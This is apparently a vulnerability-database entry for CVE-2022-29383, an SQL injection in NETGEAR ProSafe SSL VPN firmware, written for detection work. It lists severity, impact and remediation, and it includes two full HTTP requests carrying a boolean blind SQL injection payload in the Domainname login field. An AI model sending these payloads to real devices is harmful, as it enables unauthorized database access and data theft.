🔙 목록으로 돌아가기

CVE-2022-29383: NETGEAR ProSafe SSL VPN firmware - SQL Injection

TitleNETGEAR ProSafe SSL VPN firmware - SQL Injection
Authorelitebaz
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service.
RemediationApply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.75246
CVE IDCVE-2022-29383
CWE IDCWE-89
Tags cve2022 cve sqli netgear router vkev vuln

🔍 Vulnerability Description

NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.

🌐 HTTP Request

POST /scgi-bin/platform.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/140.0 (x64 de)
Connection: close
Content-Length: 208
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept-Encoding: gzip

thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
POST /scgi-bin/platform.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Content-Length: 208
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept-Encoding: gzip

thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-29383.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-29383.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A